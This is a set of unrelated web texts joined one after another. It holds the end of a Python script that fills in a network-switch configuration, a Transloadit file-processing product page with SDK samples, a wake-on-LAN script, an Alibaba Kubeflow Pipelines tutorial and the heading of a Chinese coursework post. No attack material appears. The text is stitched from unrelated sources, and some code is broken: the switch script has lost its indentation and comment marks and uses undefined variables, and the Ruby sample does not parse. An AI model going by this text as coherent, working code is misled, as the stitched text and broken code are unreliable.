print('What is the hostname of the device?')
hostname = input()
print('What is the branch IP number? Example: type 28 for 10.28.10.1')
ipxx = input()
print('What City is the branch in? Example: Paris')
city = input()
print('What State or Country is the branch in? Example: France')
state = input()
print('How many switches will the branch have?')
switch_number = int(input())
switch_dict = {}
for i in range(switch_number):
switchnumber = i
print("What is the serial number of switch ",i,"?")
switch_dict.update( {switchnumber: input()})
If more than two switches, create additional lines of configuration for port and virtual chassis
add_sw_ports = ""
add_sw_vr_chass = ""
for k, v in switch_dict.items():
if k > 1:
k = str(k)
add_sw_ports += ("set interfaces interface-range access_ports member-range ge-"+k+"/0/1 to ge-"+k+"/0/47\n")
add_sw_vr_chass += ("set virtual-chassis member "+k+" serial-number "+v+" role line-card\n")
Create dictionary that references variables in switch_template and above newly created variables
device_values = {
'[hostname]': hostname,
'[xx]': ipxx,
'[name]': city,
'[location]': city_state,
'[serial_1]': switch_dict[0],
'[serial_2]': switch_dict[1],
'/*additional_swch_ports*/': add_sw_ports,
'/*additional_swch_vr_chas*/': add_sw_vr_chass,
}
Finally, replace the variables in switch_template with newly created variables and then print this out
for key,val in device_values.items():
tempstr = tempstr.replace(key,val)
print(tempstr)
You can find the example switch template and python script on my GitHub account:
|
We are a Swiss Army knife for your files
Transloadit is a service for companies with developers. We handle their file uploads and media processing. This means that they can save on development time and the heavy machinery that is required to handle big volumes in an automated way.
We pioneered with this concept in 2009 and have made our customers happy ever since. We are still actively improving our service in 2021, as well as our open source projects uppy.io and tus.io, which are changing how the world does file uploading.
WarningIt seems your browser does not send the referer, which we need to stop people from (ab)using our demos in other websites. If you want to use the demos, please allow your browser to send its referer to us. Adding us to the whitelist of blockers usually helps.
1. Handle uploads
We can handle uploads of your users directly. Learn more ›
WarningIt seems your browser does not support the codec used in this video of the demo. For demo simplicity we'll link you to the original file, but you may also want to learn how to make videos compatible for all browsers.
2. Compress files
We can both archive and extract entire media libraries. Learn more ›
WarningIt seems your browser does not support the codec used in this video of the demo. For demo simplicity we'll link you to the original file, but you may also want to learn how to make videos compatible for all browsers.
3. Export files to Amazon S3
We export to the storage platform of your choice. Learn more ›
Once all files have been exported, we can ping a URL of your choice with the Assembly status JSON.
Build this in your own language
{
":original": {
"robot": "/upload/handle"
},
"archived": {
"use": {
"steps": [
":original"
],
"bundle_steps": true
},
"robot": "/file/compress",
"result": true,
"format": "zip"
},
"exported": {
"use": [
"archived",
":original"
],
"robot": "/s3/store",
"credentials": "YOUR_AWS_CREDENTIALS",
"url_prefix": "https://demos.transloadit.com/"
}
}
# Prerequisites: brew install curl jq || sudo apt install curl jq
# To avoid tampering, use Signature Authentication
echo '{
"auth": {
"key": "YOUR_TRANSLOADIT_KEY"
},
"steps": {
":original": {
"robot": "/upload/handle"
},
"archived": {
"use": {
"steps": [
":original"
],
"bundle_steps": true
},
"robot": "/file/compress",
"result": true,
"format": "zip"
},
"exported": {
"use": [
"archived",
":original"
],
"robot": "/s3/store",
"credentials": "YOUR_AWS_CREDENTIALS",
"url_prefix": "https://demos.transloadit.com/"
}
}
}' |curl \
--request POST \
--form 'params=<-' \
--form my_file1=@./ben-o-sullivan-382817.jpg \
--form my_file2=@./anete-lusina-382336.jpg \
https://api2.transloadit.com/assemblies \
|jq
// Add 'Transloadit' to your Podfile, run 'pod install', add credentials to 'Info.plist'
import Arcane
import TransloaditKit
// Set Encoding Instructions
var AssemblySteps: Array = Array<Step>() // An array to hold the Steps
var Step1 = Step (key: ":original") // Create a Step object
Step1?.setValue("/upload/handle", forOption: "robot") // Add the details
AssemblySteps.append(Step1) // Add the Step to the array
var Step2 = Step (key: "archived") // Create a Step object
Step2?.setValue({"steps":[":original"],"bundle_steps":true}, forOption: "use") // Add the details
Step2?.setValue("/file/compress", forOption: "robot") // Add the details
Step2?.setValue(true, forOption: "result") // Add the details
Step2?.setValue("zip", forOption: "format") // Add the details
AssemblySteps.append(Step2) // Add the Step to the array
var Step3 = Step (key: "exported") // Create a Step object
Step3?.setValue(["archived",":original"], forOption: "use") // Add the details
Step3?.setValue("/s3/store", forOption: "robot") // Add the details
Step3?.setValue("YOUR_AWS_CREDENTIALS", forOption: "credentials") // Add the details
Step3?.setValue("https://demos.transloadit.com/", forOption: "url_prefix") // Add the details
AssemblySteps.append(Step3) // Add the Step to the array
// We then create an Assembly Object with the Steps and files
var MyAssembly: Assembly = Assembly(steps: AssemblySteps, andNumberOfFiles: 1)
// Add files to upload
MyAssembly.addFile("./ben-o-sullivan-382817.jpg")
MyAssembly.addFile("./anete-lusina-382336.jpg")
// Start the Assembly
Transloadit.createAssembly(MyAssembly)
// Fires after your Assembly has completed
transloadit.assemblyStatusBlock = {(_ completionDictionary: [AnyHashable: Any]) -> Void in
print("\(completionDictionary.description)")
}
<body>
<form action="/uploads" enctype="multipart/form-data" method="POST">
<input type="file" name="my_file" multiple="multiple" />
</form>
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.2.0/jquery.min.js"></script>
<script src="//assets.transloadit.com/js/jquery.transloadit2-v3-latest.js"></script>
<script type="text/javascript">
$(function() {
$('form').transloadit({
wait: true,
triggerUploadOnFileSelection: true,
params: {
auth: {
// To avoid tampering use signatures:
// https://transloadit.com/docs/api/#authentication
key: 'YOUR_TRANSLOADIT_KEY',
},
// It's often better store encoding instructions in your account
// and use a `template_id` instead of adding these steps inline
steps: {
':original': {
robot: '/upload/handle'
},
archived: {
use: {'steps':[':original'],'bundle_steps':true},
robot: '/file/compress',
result: true,
format: 'zip'
},
exported: {
use: ['archived',':original'],
robot: '/s3/store',
credentials: 'YOUR_AWS_CREDENTIALS',
url_prefix: 'https://demos.transloadit.com/'
}
}
}
});
});
</script>
</body>
<!-- This pulls Uppy from our CDN. Alternatively use `npm i @uppy/robodog --save` -->
<!-- if you want smaller self-hosted bundles and/or to use modern JavaScript -->
<link href="//releases.transloadit.com/uppy/robodog/v1.6.7/robodog.min.css" rel="stylesheet">
<script src="//releases.transloadit.com/uppy/robodog/v1.6.7/robodog.min.js"></script>
<button id="browse">Select Files</button>
<script>
document.getElementById('browse').addEventListener('click', function () {
var uppy = window.Robodog.pick({
providers: [ 'instagram', 'url', 'webcam', 'dropbox', 'google-drive', 'facebook', 'onedrive' ],
waitForEncoding: true,
params: {
// To avoid tampering, use Signature Authentication
auth: { key: 'YOUR_TRANSLOADIT_KEY' },
// To hide your `steps`, use a `template_id` instead
steps: {
':original': {
robot: '/upload/handle'
},
archived: {
use: {'steps':[':original'],'bundle_steps':true},
robot: '/file/compress',
result: true,
format: 'zip'
},
exported: {
use: ['archived', ':original'],
robot: '/s3/store',
credentials: 'YOUR_AWS_CREDENTIALS',
url_prefix: 'https://demos.transloadit.com/'
}
}
}
}).then(function (bundle) {
// Due to `waitForEncoding: true` this is fired after encoding is done.
// Alternatively, set `waitForEncoding` to `false` and provide a `notify_url`
// for Async Mode where your back-end receives the encoding results
// so that your user can be on their way as soon as the upload completes.
console.log(bundle.transloadit) // Array of Assembly Statuses
console.log(bundle.results) // Array of all encoding results
}).catch(console.error)
})
</script>
// yarn add transloadit || npm i transloadit --save-exact
const Transloadit = require('transloadit')
const transloadit = new Transloadit({
authKey: 'YOUR_TRANSLOADIT_KEY',
authSecret: 'YOUR_TRANSLOADIT_SECRET'
})
// Set Encoding Instructions
const options = {
params: {
steps: {
':original': {
robot: '/upload/handle',
},
archived: {
use: {'steps':[':original'],'bundle_steps':true},
robot: '/file/compress',
result: true,
format: 'zip',
},
exported: {
use: ['archived',':original'],
robot: '/s3/store',
credentials: 'YOUR_AWS_CREDENTIALS',
url_prefix: 'https://demos.transloadit.com/',
},
}
}
}
// Add files to upload
transloadit.addFile('myfile_1', './ben-o-sullivan-382817.jpg')
transloadit.addFile('myfile_2', './anete-lusina-382336.jpg')
// Start the Assembly
transloadit.createAssembly(options, (err, result) => {
if (err) {
throw err
}
console.log({result})
})
[sudo] npm install transloadify -g
export TRANSLOADIT_KEY="YOUR_TRANSLOADIT_KEY"
export TRANSLOADIT_SECRET="YOUR_TRANSLOADIT_SECRET"
# Save Encoding Instructions
echo '{
":original": {
"robot": "/upload/handle"
},
"archived": {
"use": {
"steps": [
":original"
],
"bundle_steps": true
},
"robot": "/file/compress",
"result": true,
"format": "zip"
},
"exported": {
"use": [
"archived",
":original"
],
"robot": "/s3/store",
"credentials": "YOUR_AWS_CREDENTIALS",
"url_prefix": "https://demos.transloadit.com/"
}
}' > ./steps.json
transloadify \
--input "./ben-o-sullivan-382817.jpg" \
--input "./anete-lusina-382336.jpg" \
--output "./output.example" \
--steps "./steps.json"
// composer require transloadit/php-sdk
use transloadit\Transloadit;
$transloadit = new Transloadit([
"key" => "YOUR_TRANSLOADIT_KEY",
"secret" => "YOUR_TRANSLOADIT_SECRET",
]);
// Add files to upload
$files = [];
array_push($files, "./ben-o-sullivan-382817.jpg")
array_push($files, "./anete-lusina-382336.jpg")
// Start the Assembly
$response = $transloadit->createAssembly([
"files" => $files,
"params" => [
"steps" => [
":original" => [
"robot" => "/upload/handle",
],
"archived" => [
"use" => [
"steps" => [":original"],
"bundle_steps" => true,
],
"robot" => "/file/compress",
"result" => true,
"format" => "zip",
],
"exported" => [
"use" => ["archived", ":original"],
"robot" => "/s3/store",
"credentials" => "YOUR_AWS_CREDENTIALS",
"url_prefix" => "https://demos.transloadit.com/",
],
],
],
]);
# gem install transloadit
transloadit = Transloadit.new(
:key => "YOUR_TRANSLOADIT_KEY",
:secret => "YOUR_TRANSLOADIT_SECRET"
)
# Set Encoding Instructions
:original = transloadit.step ":original", "/upload/handle",
)
archived = transloadit.step "archived", "/file/compress",
:use => {"steps":[":original"],"bundle_steps":true},
:result => true,
:format => "zip"
)
exported = transloadit.step "exported", "/s3/store",
:use => ["archived",":original"],
:credentials => "YOUR_AWS_CREDENTIALS",
:url_prefix => "https://demos.transloadit.com/"
)
assembly = transloadit.assembly(
:steps => [ :original, archived, exported ]
)
# Add files to upload
files = []
files.push("./ben-o-sullivan-382817.jpg")
files.push("./anete-lusina-382336.jpg")
# Start the Assembly
response = assembly.create! *files
until response.finished?
sleep 1; response.reload!
end
if !response.error?
# handle success
end
# pip install pytransloadit
from transloadit import client
tl = client.Transloadit('YOUR_TRANSLOADIT_KEY', 'YOUR_TRANSLOADIT_SECRET')
assembly = tl.new_assembly()
# Set Encoding Instructions
assembly.add_step(':original', {
'robot': '/upload/handle'
})
assembly.add_step('archived', {
'use': {'steps':[':original'],'bundle_steps':true},
'robot': '/file/compress',
'result': true,
'format': 'zip'
})
assembly.add_step('exported', {
'use': ['archived',':original'],
'robot': '/s3/store',
'credentials': 'YOUR_AWS_CREDENTIALS',
'url_prefix': 'https://demos.transloadit.com/'
})
# Add files to upload
assembly.add_file(open('./ben-o-sullivan-382817.jpg', 'rb'))
assembly.add_file(open('./anete-lusina-382336.jpg', 'rb'))
# Start the Assembly
assembly_response = assembly.create(retries=5, wait=True)
print assembly_response.data.get('assembly_id')
# or
print assembly_response.data['assembly_id']
// go get gopkg.in/transloadit/go-sdk.v1
package main
import (
"fmt"
"gopkg.in/transloadit/go-sdk.v1"
)
options := transloadit.DefaultConfig
options.AuthKey = "YOUR_TRANSLOADIT_KEY"
options.AuthSecret = "YOUR_TRANSLOADIT_SECRET"
client := transloadit.NewClient(options)
// Initialize new Assembly
assembly := transloadit.NewAssembly()
// Set Encoding Instructions
assembly.AddStep(":original", map[string]interface{}{
"robot": "/upload/handle"
})
assembly.AddStep("archived", map[string]interface{}{
"use": {"steps":[":original"],"bundle_steps":true},
"robot": "/file/compress",
"result": true,
"format": "zip"
})
assembly.AddStep("exported", map[string]interface{}{
"use": ["archived", ":original"],
"robot": "/s3/store",
"credentials": "YOUR_AWS_CREDENTIALS",
"url_prefix": "https://demos.transloadit.com/"
})
// Add files to upload
assembly.AddFile("myfile_1", "./ben-o-sullivan-382817.jpg")
assembly.AddFile("myfile_2", "./anete-lusina-382336.jpg")
// Start the Assembly
info, err := client.StartAssembly(context.Background(), assembly)
if err != nil {
panic(err)
}
// All files have now been uploaded and the Assembly has started but no
// results are available yet since the conversion has not finished.
// WaitForAssembly provides functionality for polling until the Assembly
// has ended.
info, err = client.WaitForAssembly(context.Background(), info)
if err != nil {
panic(err)
}
fmt.Printf("You can check some results at: \n")
fmt.Printf(" - %s\n", info.Results[":original"][0].SSLURL)
fmt.Printf(" - %s\n", info.Results["archived"][0].SSLURL)
fmt.Printf(" - %s\n", info.Results["exported"][0].SSLURL)
// compile 'com.transloadit.sdk:transloadit:0.1.5'
import com.transloadit.sdk.Assembly;
import com.transloadit.sdk.Transloadit;
import com.transloadit.sdk.exceptions.LocalOperationException;
import com.transloadit.sdk.exceptions.RequestException;
import com.transloadit.sdk.response.AssemblyResponse;
import java.io.File;
import java.util.HashMap;
import java.util.Map;
public class Main {
public static void main(String[] args) {
Transloadit transloadit = new Transloadit("YOUR_TRANSLOADIT_KEY", "YOUR_TRANSLOADIT_SECRET");
Assembly assembly = transloadit.newAssembly();
// Set Encoding Instructions
Map<String Object> originalStepOptions = new HashMap();
assembly.addStep(":original", "/upload/handle", originalStepOptions);
Map<String Object> archivedStepOptions = new HashMap();
archivedStepOptions.put("use", new HashMap(){{
put("steps", new String[]{":original"});
put("bundle_steps", true);
}});
archivedStepOptions.put("result", true);
archivedStepOptions.put("format", "zip");
assembly.addStep("archived", "/file/compress", archivedStepOptions);
Map<String Object> exportedStepOptions = new HashMap();
exportedStepOptions.put("use", new String[]{"archived", ":original"});
exportedStepOptions.put("credentials", "YOUR_AWS_CREDENTIALS");
exportedStepOptions.put("url_prefix", "https://demos.transloadit.com/");
assembly.addStep("exported", "/s3/store", exportedStepOptions);
// Add files to upload
assembly.addFile(new File("./ben-o-sullivan-382817.jpg"));
assembly.addFile(new File("./anete-lusina-382336.jpg"));
// Start the Assembly
try {
AssemblyResponse response = assembly.save();
// Wait for Assembly to finish executing
while (!response.isFinished()) {
response = transloadit.getAssemblyByUrl(response.getSslUrl());
}
System.out.println(response.getId());
System.out.println(response.getUrl());
System.out.println(response.json());
} catch (RequestException | LocalOperationException e) {
// Handle exception here
}
}
}
So many ways to integrate
Bulk imports
Add one of our import Robots to acquire and transcode massive media libraries.
Handling uploads
Front-end integration
We integrate with web browsers via our next-gen file uploader Uppy and SDKs for Android and iOS.
Back-end integration
Pingbacks
Configure anotify_urlto let your server receive transcoding results JSON in thetransloaditPOST field.
|
blob: be7ae4970b77a2ce7a6a9df331efa9e3bd9027cf (
plain
)
#!/usr/bin/python
# wake up a host when people try to ssh to it.
# requires a iptables forward rule like this (ferm style):
#
# domain (ip ip6) table filter chain $ch
# daddr <ipv4addr>
# proto tcp dport 22 tcp-flags (SYN ACK FIN RST) SYN
# mod state state NEW
# mod limit limit 1/minute limit-burst 1
# NFLOG nflog-group 1371 nflog-prefix "ssh to valiant";
#
# run from cron:
# @reboot screen -d -S wol -m ./wol-valiant <aa:bb:cc:dd:ee:ff> <ipv4addr> <interface>
#
# Depends: wakeonlan python-dpkt python-nflog
# Copyright 2013-2017 Peter Palfrader
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import dpkt, nflog, socket, subprocess, sys, time
import optparse
NFLOG_GROUP = 1371
def cb(payload):
#print payload
#print payload.__dict__
#print "payload len ", payload.get_length()
data = payload.get_data()
pkt = dpkt.ip.IP(data)
#print "proto:", pkt.p
#print "source: %s" % socket.inet_ntoa(pkt.src)
#print "dest: %s" % socket.inet_ntoa(pkt.dst)
#if pkt.p == dpkt.ip.IP_PROTO_TCP:
# print " sport: %s" % pkt.tcp.sport
# print " dport: %s" % pkt.tcp.dport
#return 1
print "[%s] python callback called because of %s!"%(time.strftime("%Y-%m-%d %H:%M:%S"), socket.inet_ntoa(pkt.src))
subprocess.call(['wakeonlan', MAC])
subprocess.call(['ip', 'neigh', 'replace', IPADDR, 'lladdr', MAC, 'nud', 'stale', 'dev', INTERFACE])
sys.stdout.flush()
parser = optparse.OptionParser()
parser.set_usage("%prog <mac addr> <ip addr> <interface>")
(options, args) = parser.parse_args()
if len(args) != 3:
parser.print_help()
sys.exit(1)
MAC = args[0]
IPADDR = args[1]
INTERFACE = args[2]
l = nflog.log()
print "setting callback"
l.set_callback(cb)
print "open"
l.fast_open(NFLOG_GROUP, socket.AF_INET)
print "trying to run"
try:
l.try_run()
except KeyboardInterrupt, e:
print "interrupted"
print "unbind"
l.unbind(socket.AF_INET)
print "close"
l.close()
|
By Che Yang, nicknamed Biran at Alibaba.
In the previous article in this series, Unlock Cloud-native AI Skills | Build a Machine Learning System on Kubernetes, we set up a Kubeflow Pipelines platform. Now, we can try it out with a real case. Let's learn how to develop a Kubeflow Pipelines-based machine learning workflow.
A machine learning workflow is a task-driven and data-driven process. In this process, we import and prepare data, export and evaluate model training checkpoints, and export the final model. To do this, we need to use a distributed storage system as the transmission medium. In this example, we use a network-attached storage (NAS) as the distributed storage. To do this follow these steps:
Note that, in this tutorial, we use a NAS as the distributed storage, and we need to replace NFS_SERVER_IP with the real NAS server address.
2. Create /data in the network file system (NFS) server.
# mkdir -p /nfs
# mount -t nfs -o vers=4.0 NFS_SERVER_IP:/ /nfs
# mkdir -p /data
# cd /
# umount /nfs
3. Create a corresponding persistent volume.
# cat nfs-pv.yaml
apiVersion: v1
kind: PersistentVolume
metadata:
name: user-susan
labels:
user-susan: pipelines
spec:
persistentVolumeReclaimPolicy: Retain
capacity:
storage: 10Gi
accessModes:
- ReadWriteMany
nfs:
server: NFS_SERVER_IP
path: "/data"
# kubectl create -f nfs-pv.yaml
4. Create a persistent volume claim (PVC).
# cat nfs-pvc.yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: user-susan
annotations:
description: "this is the mnist demo"
owner: Tom
spec:
accessModes:
- ReadWriteMany
resources:
requests:
storage: 5Gi
selector:
matchLabels:
user-susan: pipelines
# kubectl create -f nfs-pvc.yaml
The examples provided on Kubeflow Pipelines depend on Google's storage service. As Google is inaccessible in China, users in China cannot truly experience the capabilities of Kubeflow Pipelines. For this reason, an example of training the Modified National Institute of Standards and Technology (MNIST) model based on Alibaba Cloud NAS was provided to help you get started with and learn about Kubeflow Pipelines on Alibaba Cloud. The example includes the following steps:
Each of the three steps depends on the previous step.
You can use Python code to describe this process on Kubeflow Pipelines. For the complete code, see standalone_pipeline.py.
In this example, we use arena_op, which is based on the Arena open-source project. This API is obtained by packaging default container_op in Kubeflow. It can seamlessly connect to the message passing interface (MPI) and parameter server (PS) modes of distributed training. In addition, it allows you to easily gain access to distributed storage by using heterogeneous devices such as a graphics processing unit (GPU) or remote direct memory access (RDMA). You can also conveniently synchronize code from Git sources. It is really a useful API tool.
@dsl.pipeline(
name='pipeline to run jobs',
description='shows how to run pipeline jobs.'
)
def sample_pipeline(learning_rate='0.01',
dropout='0.9',
model_version='1',
commit='f097575656f927d86d99dd64931042e1a9003cb2'):
"""A pipeline for end to end machine learning workflow."""
data=["user-susan:/training"]
gpus=1
# 1. prepare data
prepare_data = arena.standalone_job_op(
name="prepare-data",
image="byrnedo/alpine-curl",
data=data,
command="mkdir -p /training/dataset/mnist && \
cd /training/dataset/mnist && \
curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/t10k-images-idx3-ubyte.gz && \
curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/t10k-labels-idx1-ubyte.gz && \
curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/train-images-idx3-ubyte.gz && \
curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/train-labels-idx1-ubyte.gz")
# 2. downalod source code and train the models
train = arena.standalone_job_op(
name="train",
image="tensorflow/tensorflow:1.11.0-gpu-py3",
sync_source="https://code.aliyun.com/xiaozhou/tensorflow-sample-code.git",
env=["GIT_SYNC_REV=%s" % (commit)],
gpus=gpus,
data=data,
command='''
echo %s;python code/tensorflow-sample-code/tfjob/docker/mnist/main.py \
--max_steps 500 --data_dir /training/dataset/mnist \
--log_dir /training/output/mnist --learning_rate %s \
--dropout %s''' % (prepare_data.output, learning_rate, dropout),
metrics=["Train-accuracy:PERCENTAGE"])
# 3. export the model
export_model = arena.standalone_job_op(
name="export-model",
image="tensorflow/tensorflow:1.11.0-py3",
sync_source="https://code.aliyun.com/xiaozhou/tensorflow-sample-code.git",
env=["GIT_SYNC_REV=%s" % (commit)],
data=data,
command="echo %s;python code/tensorflow-sample-code/tfjob/docker/mnist/export_model.py --model_version=%s --checkpoint_path=/training/output/mnist /training/output/models" % (train.output, model_version))
Kubeflow Pipelines converts the preceding code into a directed acyclic graph (DAG). Each node in the DAG is a component, and the lines connecting the components represent the dependencies between them. You can see the DAG on the Pipelines UI.
First, let's talk about data preparation. We have provided the Python API arena.standalone_job_op. Now we need to specify the following parameters: name (which is the name of this step), image (the container image to be used), and data (the data to be used and the directory to which the data is mounted within the container).
Here, data is in the array format. For example, data = ["user-susan:/training"] indicates multiple pieces of data that can be mounted, where user-susan is the previously created PVC, and /training is the directory to which the data is mounted within the container.
prepare_data = arena.standalone_job_op(
name="prepare-data",
image="byrnedo/alpine-curl",
data=data,
command="mkdir -p /training/dataset/mnist && \
cd /training/dataset/mnist && \
curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/t10k-images-idx3-ubyte.gz && \
curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/t10k-labels-idx1-ubyte.gz && \
curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/train-images-idx3-ubyte.gz && \
curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/train-labels-idx1-ubyte.gz")
Actually, the preceding step uses curl to download the data from the specified address to the /training/dataset/mnist directory in the distributed storage. Note that /training is the root directory, which is similar to a root mounting point, and /training/dataset/mnist is a sub-directory of the distributed storage. In fact, in the following steps, the same root mounting point can be used to read data and perform operations.
The second step is to download code and train the model based on the data downloaded to the distributed storage. Before downloading the code, use Git to specify a fixed commit ID.
train = arena.standalone_job_op(
name="train",
image="tensorflow/tensorflow:1.11.0-gpu-py3",
sync_source="https://code.aliyun.com/xiaozhou/tensorflow-sample-code.git",
env=["GIT_SYNC_REV=%s" % (commit)],
gpus=gpus,
data=data,
command='''
echo %s;python code/tensorflow-sample-code/tfjob/docker/mnist/main.py \
--max_steps 500 --data_dir /training/dataset/mnist \
--log_dir /training/output/mnist --learning_rate %s \
--dropout %s''' % (prepare_data.output, learning_rate, dropout),
metrics=["Train-accuracy:PERCENTAGE"])
As you can see, this step is more complex than data preparation. In addition to specifying the name, image, data, and command parameters as in the first step, we need to specify the following parameters in this model training step:
sync_source when calling the API and set GIT_SYNC_REV in env to specify the commit ID of the code to be trained.PERCENTAGE or RAW. For example, metrics = ["Train-accuracy:PERCENTAGE"]. Second, output {metrics name }={ value} or {metrics name }:{ value} in the actual model code because Pipelines collect metrics from stdout logs by default. For more information, see Sample Code.
After setting the data parameter, which is the same as the prepare_data parameter, to ["user-susan:/training"], you can read the corresponding data in the training code, for example, --data_dir /training/dataset/mnist.
This step depends on the prepare_data parameter. You can specify prepare_data.output to indicate the dependency between the two steps.
The export_model parameter is to generate a training model based on a checkpoint obtained through the train parameter.
export_model = arena.standalone_job_op(
name="export-model",
image="tensorflow/tensorflow:1.11.0-py3",
sync_source="https://code.aliyun.com/xiaozhou/tensorflow-sample-code.git",
env=["GIT_SYNC_REV=%s" % (commit)],
data=data,
command="echo %s;python code/tensorflow-sample-code/tfjob/docker/mnist/export_model.py --model_version=%s --checkpoint_path=/training/output/mnist /training/output/models" % (train.output, model_version))
The export_model parameter is similar to and simpler than the train parameter. It simply exports code from the Git synchronization model and then uses the checkpoints in the shared directory /training/output/mnist to export the model.
The entire workflow is much more intuitive. Now, let's define a Python method to integrate the entire process:
@dsl.pipeline(
name='pipeline to run jobs',
description='shows how to run pipeline jobs.'
)
def sample_pipeline(learning_rate='0.01',
dropout='0.9',
model_version='1',
commit='f097575656f927d86d99dd64931042e1a9003cb2'):
The @dsl.pipeline parameter is a decorator that indicates the workflow. It defines two attributes: name and description.
The entry point method sample_pipeline defines four parameters: learning_rate, dropout, model_version, and commit. These parameters can be used at the preceding train and export_model stages. The parameter values are in the format of dsl.PipelineParam, so that they can be converted into input forms through the native UI of Kubeflow Pipelines. The keyword of an input form is the parameter's name, and the default value of the input form is the parameter's value. Note that the value of dsl.PipelineParam can only be a string or numerical value. Arrays, maps, and custom values cannot be converted through transformation.
In fact, you can overwrite these parameters when submitting a workflow. The following figure shows the UI where you can submit a workflow.
The Python domain-specific language (DSL) that you previously used to develop the workflow can be submitted to the Kubeflow Pipelines service in your own Kubernetes. Actually, it is easy to submit code.
KFP_SERVICE="ml-pipeline.kubeflow.svc.cluster.local:8888"
import kfp.compiler as compiler
compiler.Compiler().compile(sample_pipeline, __file__ + '.tar.gz')
client = kfp.Client(host=KFP_SERVICE)
try:
experiment_id = client.get_experiment(experiment_name=EXPERIMENT_NAME).id
except:
experiment_id = client.create_experiment(EXPERIMENT_NAME).id
run = client.run_pipeline(experiment_id, RUN_ID, __file__ + '.tar.gz',
params={'learning_rate':learning_rate,
'dropout':dropout,
'model_version':model_version,
'commit':commit})
First, run compiler.compile to compile the Python code into a DAG configuration file that can be identified by the execution engine Argo.
Second, on the Kubeflow Pipelines client, create an experiment or find an existing experiment and submit the previously compiled DAG configuration file.
Third, prepare a Python 3 environment in the cluster and install a Kubeflow Pipelines software development kit (SDK).
# kubectl create job pipeline-client --namespace kubeflow --image python:3 -- sleep infinity
# kubectl exec -it -n kubeflow $(kubectl get po -l job-name=pipeline-client -n kubeflow | grep -v NAME| awk '{print $1}') bash
Fourth, log on to the Python 3 environment and run the following commands to successively submit two tasks with different parameters.
# pip3 install http://kubeflow.oss-cn-beijing.aliyuncs.com/kfp/0.1.14/kfp.tar.gz --upgrade
# pip3 install http://kubeflow.oss-cn-beijing.aliyuncs.com/kfp-arena/kfp-arena-0.4.tar.gz --upgrade
# curl -O https://raw.githubusercontent.com/cheyang/pipelines/update_standalone_sample/samples/arena-samples/standalonejob/standalone_pipeline.py
# python3 standalone_pipeline.py --learning_rate 0.0001 --dropout 0.8 --model_version 2
# python3 standalone_pipeline.py --learning_rate 0.0005 --dropout 0.8 --model_version 3
Log on to the Kubeflow Pipelines UI: [https://](){pipeline address}/pipeline/#/experiments. For example:
https://11.124.285.171/pipeline/#/experiments
To compare metrics such as the input, duration, and accuracy of the two experiments, you can click the Compare runs button. Making an experiment traceable is the first step to make the experiment reproducible. Leveraging the experiment management capabilities of Kubeflow Pipelines is the first step to enable experiment reproducibility.
To implement a runnable Kubeflow Pipeline, do as follows:
dsl.container_ops API, you need to construct two parts of code:
container_op = dsl.ContainerOp(
name=name,
image='<train-image>',
arguments=[
'--input_dir', input_dir,
'--output_dir', output_dir,
'--model_name', model_name,
'--model_version', model_version,
'--epochs', epochs
],
file_outputs={'output': '/output.txt'}
)
container_op.add_volume(k8s_client.V1Volume(
host_path=k8s_client.V1HostPathVolumeSource(
path=persistent_volume_path),
name=persistent_volume_name))
container_op.add_volume_mount(k8s_client.V1VolumeMount(
mount_path=persistent_volume_path,
name=persistent_volume_name))
The native dsl.container_ops API improves flexibility. It enables the interface that interacts with Pipelines. This allows users to do a lot of things through container_ops. However, it also has many drawbacks:
container_op API performs an operation for a single container. To support distributed training, you must submit and manage tasks such as a TensorFlow training jobs (TFJob) through container_ops. This increases the complexity and poses security challenges. It is easy to understand that this produces high complexity. Regarding security, since you need to grant additional permissions to pipeline developers to submit TFJob-like tasks, the permissions represent security risks.
Alternatively, you can choose to use the reusable component API arena_op. The universal runtime code used by this API spares you from repeatedly constructing runtime code. In addition, the universal arena_op API is user-friendly and supports both PS and MPI scenarios. We recommend that you use this method to compile pipelines.
Are you eager to know the latest tech trends in Alibaba Cloud? Hear it from our top experts in our newly launched series, Tech Show!
Alibaba Clouder - December 31, 2020
Alibaba Clouder - November 14, 2018
Alex - July 9, 2020
Alibaba Clouder - July 12, 2019
Alibaba Clouder - April 2, 2019
yzq1989 - April 10, 2020
An end-to-end platform that provides various machine learning algorithms to meet your data mining and analysis requirements.
Learn More
ET Brain is Alibaba Cloud’s ultra-intelligent AI Platform for solving complex business and social problems
Learn More
A secure image hosting platform providing containerized image lifecycle management
Learn More
Alibaba Cloud Container Service for Kubernetes is a fully managed cloud container management service that supports native Kubernetes and integrates with other Alibaba Cloud products.
Learn More
More Posts by Alibaba Container Service
|
2020软件工程第一次个人编程作业
这个作业属于哪个课程 https://edu.cnblogs.com/campus/fzu/SE2020
这个作业要求在哪里 https://edu.cnblogs.com/campus/fzu/SE2020/homework/11167
这个作业的目标 <学习 git 使用,json 文本在 Python 中的处理方法,GitHub fork 仓库和 PullRequest,用 coverage 测试代码覆盖率和优化代码>
